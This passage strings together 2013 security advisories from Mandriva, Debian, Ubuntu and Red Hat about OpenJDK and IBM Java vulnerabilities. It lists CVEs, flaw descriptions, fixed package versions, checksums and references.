java-1.6.0-openjdk packages fix security vulnerabilities:\n \n Multiple flaws were discovered in the ImagingLib and the image\n attribute, channel, layout and raster processing in the 2D\n component. An untrusted Java application or applet could possibly\n use these flaws to trigger Java Virtual Machine memory corruption\n (CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473,\n CVE-2013-2463, CVE-2013-2465, CVE-2013-2469). \n \n Integer overflow flaws were found in the way AWT processed certain\n input. An attacker could use these flaws to execute arbitrary code\n with the privileges of the user running an untrusted Java applet or\n application (CVE-2013-2459). \n \n Multiple improper permission check issues were discovered in the\n Sound and JMX components in OpenJDK. An untrusted Java application\n or applet could use these flaws to bypass Java sandbox restrictions\n (CVE-2013-2448, CVE-2013-2457, CVE-2013-2453). \n \n Multiple flaws in the Serialization, Networking, Libraries and CORBA\n components can be exploited by an untrusted Java application or applet\n to gain access to potentially sensitive information (CVE-2013-2456,\n CVE-2013-2447, CVE-2013-2455, CVE-2013-2452, CVE-2013-2443,\n CVE-2013-2446). \n \n It was discovered that the Hotspot component did not properly handle\n out-of-memory errors. An untrusted Java application or applet could\n possibly use these flaws to terminate the Java Virtual Machine\n (CVE-2013-2445). \n \n It was discovered that the AWT component did not properly manage\n certain resources and that the ObjectStreamClass of the Serialization\n component did not properly handle circular references. An untrusted\n Java application or applet could possibly use these flaws to cause\n a denial of service (CVE-2013-2444, CVE-2013-2450). A remote attacker could\n possibly exploit these flaws to bypass intended security mechanisms\n or disclose potentially sensitive information and cause a denial of\n service (CVE-2013-2407, CVE-2013-2461). \n \n It was discovered that JConsole did not properly inform the user when\n establishing an SSL connection failed. An attacker could exploit\n this flaw to gain access to potentially sensitive information\n (CVE-2013-2412). \n \n It was found that documentation generated by Javadoc was vulnerable to\n a frame injection attack. If such documentation was accessible over\n a network, and a remote attacker could trick a user into visiting a\n specially-crafted URL, it would lead to arbitrary web content being\n displayed next to the documentation. This could be used to perform a\n phishing attack by providing frame content that spoofed a login form\n on the site hosting the vulnerable documentation (CVE-2013-1571). \n \n It was discovered that the 2D component created shared memory segments\n with insecure permissions. A local attacker could use this flaw to\n read or write to the shared memory segment (CVE-2013-1500). \n \n It was discovered that the Networking component did not properly\n enforce exclusive port binding. A local attacker could exploit this\n flaw to bind to ports intended to be exclusively bound (CVE-2013-2451). \n \n This updates IcedTea6 to version 1.11.12, which fixes these issues,\n as well as several other bugs. \n \n Additionally, this OpenJDK update causes icedtea-web, the Java browser\n plugin, to crash, so icedtea-web has been patched to fix this. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2407\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2412\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2445\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2449\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2453\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2451\n https://rhn.redhat.com/errata/RHSA-2013-1014.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 3ae552d38d7cd10be746e4703279f789 mes5/i586/icedtea-web-1.3.2-0.4mdvmes5.2.i586.rpm\n cb106d5fa87dcb272347ccc6ff4c1c24 mes5/i586/icedtea-web-javadoc-1.3.2-0.4mdvmes5.2.i586.rpm\n 2ae9cb967329a454731c3c5c50118fb5 mes5/i586/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm\n 05afab461704f00714707dd22f4811be mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm\n dc372b36845109db264de4d33301d9e5 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm\n 55cdf45405844e373f60c3bcac1c3fbc mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm\n 48653ecc4f9b945fafbf43e972465a18 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm \n 6652ab0958ffe2b11b061f8281c3e5a7 mes5/SRPMS/icedtea-web-1.3.2-0.4mdvmes5.2.src.rpm\n 977e2c2d131ba350b6dd15cfd1bbf14c mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 6ffbc522ac4a2db8212ac963de525576 mes5/x86_64/icedtea-web-1.3.2-0.4mdvmes5.2.x86_64.rpm\n 2bc2c2b9ce03a4785ef061ca66156aaa mes5/x86_64/icedtea-web-javadoc-1.3.2-0.4mdvmes5.2.x86_64.rpm\n 841d31717e695fd649290fd561400a4d mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm\n 51bd267b7c1b2efe641e080deb68fe96 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm\n 68fb561cd1b10758db8d9d6aa7d24487 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm\n 775811371aca053a714df2d570c19720 mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm\n 7ce118640d8e59d659b020febe513427 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm \n 6652ab0958ffe2b11b061f8281c3e5a7 mes5/SRPMS/icedtea-web-1.3.2-0.4mdvmes5.2.src.rpm\n 977e2c2d131ba350b6dd15cfd1bbf14c mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFR47+cmqjQ0CJFipgRAmnTAJ4lalit4V4VWsSE6KHeem9qtHb+9gCgmJ/U\nGUelRnMi6Rq7d9NhnTCwrlg=\n=rErU\n-----END PGP SIGNATURE-----\n. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 7u25-2.3.10-1~deb7u1. In addition icedtea-web needed to be\nupdated to 1.4-3~deb7u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7u25-2.3.10-1. ============================================================================\nUbuntu Security Notice USN-1907-1\nJuly 16, 2013\n\nopenjdk-7 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 13.04\n- Ubuntu 12.10\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 7. (CVE-2013-1500, CVE-2013-2454,\nCVE-2013-2458)\n\nA vulnerability was discovered in the OpenJDK Javadoc related to data\nintegrity. (CVE-2013-1571)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure and availability. (CVE-2013-2412, CVE-2013-2443, CVE-2013-2446,\nCVE-2013-2447, CVE-2013-2449, CVE-2013-2452, CVE-2013-2456)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\navailability. (CVE-2013-2448, CVE-2013-2451, CVE-2013-2459, CVE-2013-2460,\nCVE-2013-2461, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470,\nCVE-2013-2471, CVE-2013-2472, CVE-2013-2473)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2013-2453, CVE-2013-2455, CVE-2013-2457)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 13.04:\n icedtea-7-jre-jamvm 7u25-2.3.10-1ubuntu0.13.04.2\n openjdk-7-doc 7u25-2.3.10-1ubuntu0.13.04.2\n openjdk-7-jre 7u25-2.3.10-1ubuntu0.13.04.2\n openjdk-7-jre-headless 7u25-2.3.10-1ubuntu0.13.04.2\n openjdk-7-jre-lib 7u25-2.3.10-1ubuntu0.13.04.2\n openjdk-7-jre-zero 7u25-2.3.10-1ubuntu0.13.04.2\n\nUbuntu 12.10:\n icedtea-7-jre-cacao 7u25-2.3.10-1ubuntu0.12.10.2\n icedtea-7-jre-jamvm 7u25-2.3.10-1ubuntu0.12.10.2\n openjdk-7-doc 7u25-2.3.10-1ubuntu0.12.10.2\n openjdk-7-jre 7u25-2.3.10-1ubuntu0.12.10.2\n openjdk-7-jre-headless 7u25-2.3.10-1ubuntu0.12.10.2\n openjdk-7-jre-lib 7u25-2.3.10-1ubuntu0.12.10.2\n openjdk-7-jre-zero 7u25-2.3.10-1ubuntu0.12.10.2\n\nThis update uses a new upstream release, which includes additional bug\nfixes. After a standard system update you need to restart any Java\napplications or applets to make all the necessary changes. Summary:\n\nUpdated java-1.6.0-ibm packages that fix several security issues are now\navailable for Red Hat Network Satellite Server 5.5. \n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Satellite 5.5 (RHEL v.5) - s390x, x86_64\nRed Hat Satellite 5.5 (RHEL v.6) - s390x, x86_64\n\n3. Description:\n\nThis update corrects several security vulnerabilities in the IBM Java\nRuntime Environment shipped as part of Red Hat Network Satellite Server\n5.5. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets. \n(CVE-2012-0547, CVE-2012-0551, CVE-2012-1531, CVE-2012-1532, CVE-2012-1533,\nCVE-2012-1541, CVE-2012-1682, CVE-2012-1713, CVE-2012-1716, CVE-2012-1717,\nCVE-2012-1718, CVE-2012-1719, CVE-2012-1721, CVE-2012-1722, CVE-2012-1725,\nCVE-2012-3143, CVE-2012-3159, CVE-2012-3213, CVE-2012-3216, CVE-2012-3342,\nCVE-2012-4820, CVE-2012-4822, CVE-2012-4823, CVE-2012-5068, CVE-2012-5069,\nCVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5079,\nCVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5089, CVE-2013-0169,\nCVE-2013-0351, CVE-2013-0401, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423,\nCVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428,\nCVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438,\nCVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445,\nCVE-2013-0446, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1476,\nCVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487,\nCVE-2013-1491, CVE-2013-1493, CVE-2013-1500, CVE-2013-1537, CVE-2013-1540,\nCVE-2013-1557, CVE-2013-1563, CVE-2013-1569, CVE-2013-1571, CVE-2013-2383,\nCVE-2013-2384, CVE-2013-2394, CVE-2013-2407, CVE-2013-2412, CVE-2013-2417,\nCVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424,\nCVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435,\nCVE-2013-2437, CVE-2013-2440, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444,\nCVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451,\nCVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456,\nCVE-2013-2457, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465,\nCVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-3743)\n\nUsers of Red Hat Network Satellite Server 5.5 are advised to upgrade to\nthese updated packages, which contain the IBM Java SE 6 SR14 release. For\nthis update to take effect, Red Hat Network Satellite Server must be\nrestarted (\"/usr/sbin/rhn-satellite restart\"), as well as all running\ninstances of IBM Java. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n829358 - CVE-2012-1717 OpenJDK: insecure temporary file permissions (JRE, 7143606)\n829360 - CVE-2012-1716 OpenJDK: SynthLookAndFeel application context bypass (Swing, 7143614)\n829361 - CVE-2012-1713 OpenJDK: fontmanager layout lookup code memory corruption (2D, 7143617)\n829371 - CVE-2012-1719 OpenJDK: mutable repository identifiers in generated stub code (CORBA, 7143851)\n829372 - CVE-2012-1718 OpenJDK: CRL and certificate extensions handling improvements (Security, 7143872)\n829376 - CVE-2012-1725 OpenJDK: insufficient invokespecial \u003cinit\u003e verification (HotSpot, 7160757)\n831353 - CVE-2012-1721 Oracle JDK: unspecified vulnerability fixed in 6u33 and 7u5 (Deployment)\n831354 - CVE-2012-1722 Oracle JDK: unspecified vulnerability fixed in 6u33 and 7u5 (Deployment)\n831355 - CVE-2012-0551 Oracle JDK: unspecified vulnerability fixed in 6u33 and 7u5 (Deployment)\n853097 - CVE-2012-1682 OpenJDK: beans ClassFinder insufficient permission checks (beans, 7162476)\n853228 - CVE-2012-0547 OpenJDK: AWT hardening fixes (AWT, 7163201)\n859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)\n865346 - CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)\n865348 - CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)\n865357 - CVE-2012-5073 OpenJDK: LogManager security bypass (Libraries, 7169884)\n865363 - CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)\n865365 - CVE-2012-5072 OpenJDK: AccessController.doPrivilegedWithCombiner() information disclosure (Security, 7172522)\n865370 - CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)\n865511 - CVE-2012-5084 OpenJDK: DefaultFormatter insufficient data validation (Swing, 7195194)\n865514 - CVE-2012-5089 OpenJDK: RMIConnectionImpl insufficient access control checks (JMX, 7198296)\n865519 - CVE-2012-5071 OpenJDK: DescriptorSupport insufficient package access checks (JMX, 7192975)\n865531 - CVE-2012-5069 OpenJDK: Executors state handling issues (Concurrency, 7189103)\n865568 - CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)\n867185 - CVE-2012-1531 Oracle JDK: unspecified vulnerability (2D)\n867186 - CVE-2012-1532 Oracle JDK: unspecified vulnerability (Deployment)\n867187 - CVE-2012-1533 Oracle JDK: unspecified vulnerability (Deployment)\n867189 - CVE-2012-3143 Oracle JDK: unspecified vulnerability (JMX)\n867190 - CVE-2012-3159 Oracle JDK: unspecified vulnerability (Deployment)\n867193 - CVE-2012-5083 Oracle JDK: unspecified vulnerability (2D)\n876386 - CVE-2012-4820 IBM JDK: java.lang.reflect.Method invoke() code execution\n876388 - CVE-2012-4822 IBM JDK: java.lang.class code execution\n876389 - CVE-2012-4823 IBM JDK: java.lang.ClassLoder defineClass() code execution\n906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)\n906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)\n906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)\n906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)\n906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)\n906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)\n906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)\n906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)\n907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)\n907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)\n907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)\n907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound)\n907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)\n907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)\n907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)\n907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)\n907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)\n907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)\n907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)\n907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)\n907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)\n907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)\n913014 - CVE-2013-1486 OpenJDK: MBeanServer insufficient privilege restrictions (JMX, 8006446)\n913030 - CVE-2013-1487 Oracle JDK: unspecified vulnerability fixed in 6u41 and 7u15 (Deployment)\n917550 - CVE-2013-0809 OpenJDK: Specially crafted sample model integer overflow (2D, 8007014)\n917553 - CVE-2013-1493 OpenJDK: CMM malformed raster memory corruption (2D, 8007675)\n920245 - CVE-2013-0401 OpenJDK: sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader (CanSecWest 2013, AWT, 8009305)\n920248 - CVE-2013-1491 Oracle JDK: unspecified sanbox bypass (CanSecWest 2013, 2D)\n952387 - CVE-2013-1537 OpenJDK: remote code loading enabled by default (RMI, 8001040)\n952509 - CVE-2013-2424 OpenJDK: MBeanInstantiator insufficient class access checks (JMX, 8006435)\n952521 - CVE-2013-2429 OpenJDK: JPEGImageWriter state corruption (ImageIO, 8007918)\n952524 - CVE-2013-2430 OpenJDK: JPEGImageReader state corruption (ImageIO, 8007667)\n952638 - CVE-2013-2420 OpenJDK: image processing vulnerability (2D, 8007617)\n952642 - CVE-2013-2422 OpenJDK: MethodUtil trampoline class incorrect restrictions (Libraries, 8009857)\n952648 - CVE-2013-1557 OpenJDK: LogStream.setDefaultStream() missing security restrictions (RMI, 8001329)\n952656 - CVE-2013-2419 ICU: Layout Engine font processing errors (JDK 2D, 8001031)\n952657 - CVE-2013-2417 OpenJDK: Network InetAddress serialization information disclosure (Networking, 8000724)\n952708 - CVE-2013-2383 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004986)\n952709 - CVE-2013-2384 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004987)\n952711 - CVE-2013-1569 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004994)\n953166 - CVE-2013-1540 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953172 - CVE-2013-1563 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install)\n953265 - CVE-2013-2394 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)\n953267 - CVE-2013-2418 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953269 - CVE-2013-2432 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)\n953270 - CVE-2013-2433 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953273 - CVE-2013-2435 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953275 - CVE-2013-2440 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375)\n975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243)\n975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248)\n975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253)\n975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257)\n975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438)\n975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597)\n975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601)\n975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071)\n975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328)\n975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744)\n975129 - CVE-2013-2454 OpenJDK: SerialJavaObject package restriction (JDBC, 8009554)\n975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038)\n975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642)\n975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120)\n975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124)\n975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330)\n975138 - CVE-2013-2452 OpenJDK: Unique VMIDs (Libraries, 8001033)\n975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812)\n975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318)\n975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638)\n975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132)\n975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703)\n975146 - CVE-2013-2451 OpenJDK: exclusive port binding (Networking, 7170730)\n975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)\n975757 - CVE-2013-2464 Oracle JDK: unspecified vulnerability fixed in 7u25 (2D)\n975761 - CVE-2013-2468 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975764 - CVE-2013-2466 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975767 - CVE-2013-3743 Oracle JDK: unspecified vulnerability fixed in 6u51 and 5u51 (AWT)\n975770 - CVE-2013-2442 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975773 - CVE-2013-2437 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n\n6. Package List:\n\nRed Hat Satellite 5.5 (RHEL v.5):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.src.rpm\n\ns390x:\njava-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.s390x.rpm\njava-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.s390x.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.x86_64.rpm\n\nRed Hat Satellite 5.5 (RHEL v.6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.src.rpm\n\ns390x:\njava-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.s390x.rpm\njava-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el6_4.s390x.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2012-0547.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0551.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1531.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1532.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1533.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1541.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1682.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1713.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1716.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1717.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1718.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1719.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1721.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1722.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1725.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-3143.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-3159.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-3213.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-3216.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-3342.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-4820.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-4822.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-4823.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5068.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5069.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5071.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5072.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5073.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5075.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5079.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5081.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5083.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5084.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-5089.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0169.h